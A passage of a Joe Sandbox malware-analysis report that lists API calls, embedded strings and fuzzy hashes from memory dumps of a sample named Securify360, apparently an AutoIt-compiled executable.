                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                              • String ID: @$ThumbnailClass
                                                                                              • API String ID: 1788623398-1539354611
                                                                                              • Opcode ID: 2842d8117e8a9af8e6c82f7d573fa30818d8f0c19b1ee275a613cf33192d9e6d
                                                                                              • Instruction ID: 47f0a572625a92e1b8e57db98e900a2439abe3c0ab2741368599e8ada1aa1f11
                                                                                              • Opcode Fuzzy Hash: 2842d8117e8a9af8e6c82f7d573fa30818d8f0c19b1ee275a613cf33192d9e6d
                                                                                              • Instruction Fuzzy Hash: 9381E4714083869BDB10DF16C885FAB77E8FF84324F248469FD898A096DB38DD45DB61
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                              • API String ID: 1038674560-1810252412
                                                                                              • Opcode ID: bab7f44da3bd161d992d58e81a21c1a6c843ea901d4a35f8deda32e9f90238dd
                                                                                              • Instruction ID: 21a3ca3e1efec2991acb09a79a2ef5199e5eabc218a147ee5ccbf39dfff29644
                                                                                              • Opcode Fuzzy Hash: bab7f44da3bd161d992d58e81a21c1a6c843ea901d4a35f8deda32e9f90238dd
                                                                                              • Instruction Fuzzy Hash: 4F31C4B1A84205E7DB14FB52CD83EEE73B4AF257A0F200129F592B6092EF5D6E04E951
                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000063), ref: 00FECBAA
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FECBBC
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00FECBD3
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00FECBE8
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00FECBEE
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00FECBFE
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00FECC04
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FECC25
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FECC3F
                                                                                              • GetWindowRect.USER32(?,?), ref: 00FECC48
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00FECCB3
                                                                                              • GetDesktopWindow.USER32 ref: 00FECCB9
                                                                                              • GetWindowRect.USER32(00000000), ref: 00FECCC0
                                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00FECD0C
                                                                                              • GetClientRect.USER32(?,?), ref: 00FECD19
                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00FECD3E
                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FECD69
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                              • String ID:
                                                                                              • API String ID: 3869813825-0
                                                                                              • Opcode ID: b5dde0dd6608dbefc295e7cc28cca6cca87736d76480697c70782371c3ffeb51
                                                                                              • Instruction ID: 8586f53327513e1ba92e33fadc4f919999b5f648923d805285db07fd4f11ef7c
                                                                                              • Opcode Fuzzy Hash: b5dde0dd6608dbefc295e7cc28cca6cca87736d76480697c70782371c3ffeb51
                                                                                              • Instruction Fuzzy Hash: 09518D30900749AFDB309FA9CE8AB6EBBF5FF48704F200918F586A2594C779A905DB50
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 0101A87E
                                                                                              • DestroyWindow.USER32(00000000,?), ref: 0101A8F8
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0101A972
                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0101A994
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101A9A7
                                                                                              • DestroyWindow.USER32(00000000), ref: 0101A9C9
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F90000,00000000), ref: 0101AA00
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101AA19
                                                                                              • GetDesktopWindow.USER32 ref: 0101AA32
                                                                                              • GetWindowRect.USER32(00000000), ref: 0101AA39
                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0101AA51
                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0101AA69
                                                                                                • Part of subcall function 00F929AB: GetWindowLongW.USER32(?,000000EB), ref: 00F929BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                              • String ID: 0$tooltips_class32
                                                                                              • API String ID: 1297703922-3619404913
                                                                                              • Opcode ID: 717e87463194fd97266d622bcd81672800deb9dc32a0ebf928f2980b43df15d1
                                                                                              • Instruction ID: 214152bf67ff2f3cd15ae27feaefe782564a0c8aaa49af87787ece4036ee73b3
                                                                                              • Opcode Fuzzy Hash: 717e87463194fd97266d622bcd81672800deb9dc32a0ebf928f2980b43df15d1
                                                                                              • Instruction Fuzzy Hash: 2371C875280340AFE721CF28C848F6B7BE5FB88310F54455CFAC687299D73AA945DB61
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0101CCCF
                                                                                                • Part of subcall function 0101B1A9: ClientToScreen.USER32(?,?), ref: 0101B1D2
                                                                                                • Part of subcall function 0101B1A9: GetWindowRect.USER32(?,?), ref: 0101B248
                                                                                                • Part of subcall function 0101B1A9: PtInRect.USER32(?,?,0101C6BC), ref: 0101B258
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0101CD38
                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0101CD43
                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0101CD66
                                                                                              • _wcscat.LIBCMT ref: 0101CD96
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0101CDAD
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0101CDC6
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0101CDDD
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0101CDFF
                                                                                              • DragFinish.SHELL32(?), ref: 0101CE06
                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0101CEF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                              • API String ID: 169749273-3440237614
                                                                                              • Opcode ID: 35f4b4b85706a5e8f07ce03692fcad93394982e52822e991b4e16bdf9940be14
                                                                                              • Instruction ID: 1df8b66515079583c086eb0e95ee6a03adb57226c34e077400ee44bcca3541a8
                                                                                              • Opcode Fuzzy Hash: 35f4b4b85706a5e8f07ce03692fcad93394982e52822e991b4e16bdf9940be14
                                                                                              • Instruction Fuzzy Hash: F0618AB1108301AFD721EF60DC89D9FBBE8FF89350F500A1EF595921A5DB35AA09CB52
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00FF831A
                                                                                              • VariantCopy.OLEAUT32(00000000,?), ref: 00FF8323
                                                                                              • VariantClear.OLEAUT32(00000000), ref: 00FF832F
                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00FF841D
                                                                                              • __swprintf.LIBCMT ref: 00FF844D
                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00FF8479
                                                                                              • VariantInit.OLEAUT32(?), ref: 00FF852A
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00FF85BE
                                                                                              • VariantClear.OLEAUT32(?), ref: 00FF8618
                                                                                              • VariantClear.OLEAUT32(?), ref: 00FF8627
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00FF8665
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                              • API String ID: 3730832054-3931177956
                                                                                              • Opcode ID: b4ff2f503e7cb7916d0b80aa09ce7fc3452887d9eadda97867151b0c2226e81e
                                                                                              • Instruction ID: 64363527e7340ae5d30994c1673ad2cb9ea7564feeb3bb5ee3b0ae59254790cf
                                                                                              • Opcode Fuzzy Hash: b4ff2f503e7cb7916d0b80aa09ce7fc3452887d9eadda97867151b0c2226e81e
                                                                                              • Instruction Fuzzy Hash: 89D19E72A04619DBDF209FA1C884B7EB7B4BF05790F248155E605DB2A4DF389C42FB91
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 01014A61
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01014AAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                              • API String ID: 3974292440-4258414348
                                                                                              • Opcode ID: e8a1c2b881cacafc81c65caf67f25170a4f8fe1fc53852b1b9d89b6a13e80fc1
                                                                                              • Instruction ID: 800ee7c5bc0616783f5d98a3707b75c0e89501e381da690492d3351c66f5af7b
                                                                                              • Opcode Fuzzy Hash: e8a1c2b881cacafc81c65caf67f25170a4f8fe1fc53852b1b9d89b6a13e80fc1
                                                                                              • Instruction Fuzzy Hash: 129169742007019BDB04EF20C891A6EB7E1BF94354F008859F8969B3A2DF39FD4ADB81
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00FFE31F
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FFE32F
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FFE33B
                                                                                              • __wsplitpath.LIBCMT ref: 00FFE399
                                                                                              • _wcscat.LIBCMT ref: 00FFE3B1
                                                                                              • _wcscat.LIBCMT ref: 00FFE3C3
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FFE3D8
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFE3EC
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFE41E
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFE43F
                                                                                              • _wcscpy.LIBCMT ref: 00FFE44B
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FFE48A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                              • String ID: *.*
                                                                                              • API String ID: 3566783562-438819550
                                                                                              • Opcode ID: 589f5663adf817354efc4ccbdbce21b3b90d307d77791e00b9cf1ed7dfa7ee60
                                                                                              • Instruction ID: a5e6efdcbb160cbdf3ecb1225eb387a49d410757b557e3591803012bca599041
                                                                                              • Opcode Fuzzy Hash: 589f5663adf817354efc4ccbdbce21b3b90d307d77791e00b9cf1ed7dfa7ee60
                                                                                              • Instruction Fuzzy Hash: AC615D765043099FDB10EF60C844DAEB7E8FF85314F04491EF98987261EB39E945DB92
                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00FFA2C2
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00FFA2E3
                                                                                              • __swprintf.LIBCMT ref: 00FFA33C
                                                                                              • __swprintf.LIBCMT ref: 00FFA355
                                                                                              • _wprintf.LIBCMT ref: 00FFA3FC
                                                                                              • _wprintf.LIBCMT ref: 00FFA41A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 311963372-3080491070
                                                                                              • Opcode ID: 17e6efbc5c935f8a04e3488d14fbe2cb508f2bb96f473b8f0df456bb2255656d
                                                                                              • Instruction ID: f53b40c5fee81f6395008db10f90237b89b7c7276e06c79e0359d2f788e043b2
                                                                                              • Opcode Fuzzy Hash: 17e6efbc5c935f8a04e3488d14fbe2cb508f2bb96f473b8f0df456bb2255656d
                                                                                              • Instruction Fuzzy Hash: 745196B1940219ABCF24EBE0CD46EEEB779BF05340F500165F509B2062DB796F58EB61
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00FDF8B8,00000001,0000138C,00000001,00000001,00000001,?,01003FF9,00000001), ref: 00FF009A
                                                                                              • LoadStringW.USER32(00000000,?,00FDF8B8,00000001), ref: 00FF00A3
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                              • GetModuleHandleW.KERNEL32(00000000,01057310,?,00000FFF,?,?,00FDF8B8,00000001,0000138C,00000001,00000001,00000001,?,01003FF9,00000001,00000001), ref: 00FF00C5
                                                                                              • LoadStringW.USER32(00000000,?,00FDF8B8,00000001), ref: 00FF00C8
                                                                                              • __swprintf.LIBCMT ref: 00FF0118
                                                                                              • __swprintf.LIBCMT ref: 00FF0129
                                                                                              • _wprintf.LIBCMT ref: 00FF01D2
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FF01E9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                              • API String ID: 984253442-2268648507
                                                                                              • Opcode ID: 6a60c9632bf04159fb6df817c069f1a2c70c5cc454c1fe1633feca2d504e3ff6
                                                                                              • Instruction ID: 6ae1d869872e3d875a7b62a5aee2f57398e9c1262c495b16debb4d2b7c4346c0
                                                                                              • Opcode Fuzzy Hash: 6a60c9632bf04159fb6df817c069f1a2c70c5cc454c1fe1633feca2d504e3ff6
                                                                                              • Instruction Fuzzy Hash: D34151B294021DAACF24FBD1CD86EEE7778BF19340F500165F605B2052DA396F08EB61
                                                                                              APIs
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00FFAA0E
                                                                                              • GetDriveTypeW.KERNEL32 ref: 00FFAA5B
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFAAA3
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFAADA
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFAB08
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                              • API String ID: 2698844021-4113822522
                                                                                              • Opcode ID: 8d89f01a6924e3320c4640ef4891f185dc436305b19ed66df8f8296249432ea8
                                                                                              • Instruction ID: 7ba85874af3b10f585831c18406bb3c5d6b4a46da756ee0e9be661825e6863a0
                                                                                              • Opcode Fuzzy Hash: 8d89f01a6924e3320c4640ef4891f185dc436305b19ed66df8f8296249432ea8
                                                                                              • Instruction Fuzzy Hash: 6F518DB11043059FC700EF20C88196AB3E4FF99758F10892DF89A57261DB39ED0ADB92
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FFA852
                                                                                              • __swprintf.LIBCMT ref: 00FFA874
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FFA8B1
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FFA8D6
                                                                                              • _memset.LIBCMT ref: 00FFA8F5
                                                                                              • _wcsncpy.LIBCMT ref: 00FFA931
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FFA966
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FFA971
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00FFA97A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FFA984
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                              • String ID: :$\$\??\%s
                                                                                              • API String ID: 2733774712-3457252023
                                                                                              • Opcode ID: 601e76b5ca7a3df676537b690d17f40004dfc3f4f5faa7de0450832f436c0609
                                                                                              • Instruction ID: 3f96363f1706f3cc36fd0703e29526685e5b6ae442614f3977cacdfbe446286d
                                                                                              • Opcode Fuzzy Hash: 601e76b5ca7a3df676537b690d17f40004dfc3f4f5faa7de0450832f436c0609
                                                                                              • Instruction Fuzzy Hash: 5731C0B190020AABDB309FA0DC49FFB77BCEF89700F6041B6FA08D2064E77596449B25
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0101982C,?,?), ref: 0101C0C8
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C0DF
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C0EA
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C0F7
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0101C100
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C10F
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0101C118
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C11F
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0101982C,?,?,00000000,?), ref: 0101C130
                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,01023C7C,?), ref: 0101C149
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0101C159
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0101C17D
                                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0101C1A8
                                                                                              • DeleteObject.GDI32(00000000), ref: 0101C1D0
                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0101C1E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
